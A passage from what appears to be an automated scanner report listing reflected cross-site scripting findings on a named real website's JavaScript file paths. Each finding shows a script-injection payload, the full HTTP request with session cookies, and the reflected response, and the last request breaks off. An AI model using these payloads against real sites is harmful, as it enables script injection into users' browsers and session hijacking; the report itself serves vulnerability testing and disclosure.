GET /jsd0bcd<script>alert(1)</script>3024933c577/blogger.js?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsd0bcd<script>alert(1)</script>3024933c577/blogger.js?1284110529</h2>
...[SNIP]...

1.72. http://www.sourcebits.com/js/blogger.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/blogger.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb3c"><script>alert(1)</script>92e1ce5f7df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsacb3c"><script>alert(1)</script>92e1ce5f7df/blogger.js?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:36 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsacb3c"><script>alert(1)</script>92e1ce5f7df/blogger.js?1284110529" />
...[SNIP]...

1.73. http://www.sourcebits.com/js/blogger.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/blogger.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5afe6"><script>alert(1)</script>8088e722c34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/blogger.js5afe6"><script>alert(1)</script>8088e722c34?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:55 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/blogger.js5afe6"><script>alert(1)</script>8088e722c34?1284110529" />
...[SNIP]...

1.74. http://www.sourcebits.com/js/blogger.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/blogger.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be8de<script>alert(1)</script>4233d99b3dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/blogger.jsbe8de<script>alert(1)</script>4233d99b3dc?1284110529 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/blogger.jsbe8de<script>alert(1)</script>4233d99b3dc?1284110529</h2>
...[SNIP]...

1.75. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/css-browser-selector.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cb44<script>alert(1)</script>2fea1448aa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9cb44<script>alert(1)</script>2fea1448aa8/css-browser-selector.js?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js9cb44<script>alert(1)</script>2fea1448aa8/css-browser-selector.js?1276841695</h2>
...[SNIP]...

1.76. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/css-browser-selector.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d99"><script>alert(1)</script>32a93e1420a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsd8d99"><script>alert(1)</script>32a93e1420a/css-browser-selector.js?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsd8d99"><script>alert(1)</script>32a93e1420a/css-browser-selector.js?1276841695" />
...[SNIP]...

1.77. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/css-browser-selector.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cced1<script>alert(1)</script>d84f8622f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/css-browser-selector.jscced1<script>alert(1)</script>d84f8622f?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/css-browser-selector.jscced1<script>alert(1)</script>d84f8622f?1276841695</h2>
...[SNIP]...

1.78. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/css-browser-selector.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a593"><script>alert(1)</script>c20a44d12a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/css-browser-selector.js7a593"><script>alert(1)</script>c20a44d12a0?1276841695 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/css-browser-selector.js7a593"><script>alert(1)</script>c20a44d12a0?1276841695" />
...[SNIP]...

1.79. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2319<script>alert(1)</script>c4d061b17c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsf2319<script>alert(1)</script>c4d061b17c6/jquery-1.3.2.min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:08 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsf2319<script>alert(1)</script>c4d061b17c6/jquery-1.3.2.min.js?1265536927</h2>
...[SNIP]...

1.80. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0778"><script>alert(1)</script>9258e0f3f6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsb0778"><script>alert(1)</script>9258e0f3f6f/jquery-1.3.2.min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:05 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsb0778"><script>alert(1)</script>9258e0f3f6f/jquery-1.3.2.min.js?1265536927" />
...[SNIP]...

1.81. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9fa9<script>alert(1)</script>9166bedf7fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.3.2.min.jsf9fa9<script>alert(1)</script>9166bedf7fc?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery-1.3.2.min.jsf9fa9<script>alert(1)</script>9166bedf7fc?1265536927</h2>
...[SNIP]...

1.82. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fc2"><script>alert(1)</script>492a52315c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.3.2.min.js41fc2"><script>alert(1)</script>492a52315c0?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery-1.3.2.min.js41fc2"><script>alert(1)</script>492a52315c0?1265536927" />
...[SNIP]...

1.83. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86632"><script>alert(1)</script>c826ccfc23e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js86632"><script>alert(1)</script>c826ccfc23e/jquery-ui-1.8.12.custom.min.js?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js86632"><script>alert(1)</script>c826ccfc23e/jquery-ui-1.8.12.custom.min.js?1305313041" />
...[SNIP]...

1.84. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df3a4<script>alert(1)</script>d316e95cbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsdf3a4<script>alert(1)</script>d316e95cbb2/jquery-ui-1.8.12.custom.min.js?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsdf3a4<script>alert(1)</script>d316e95cbb2/jquery-ui-1.8.12.custom.min.js?1305313041</h2>
...[SNIP]...

1.85. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eff75<script>alert(1)</script>e8fe75afd9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-ui-1.8.12.custom.min.jseff75<script>alert(1)</script>e8fe75afd9?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.jseff75<script>alert(1)</script>e8fe75afd9?1305313041</h2>
...[SNIP]...

1.86. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664da"><script>alert(1)</script>9cac43cf36b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-ui-1.8.12.custom.min.js664da"><script>alert(1)</script>9cac43cf36b?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
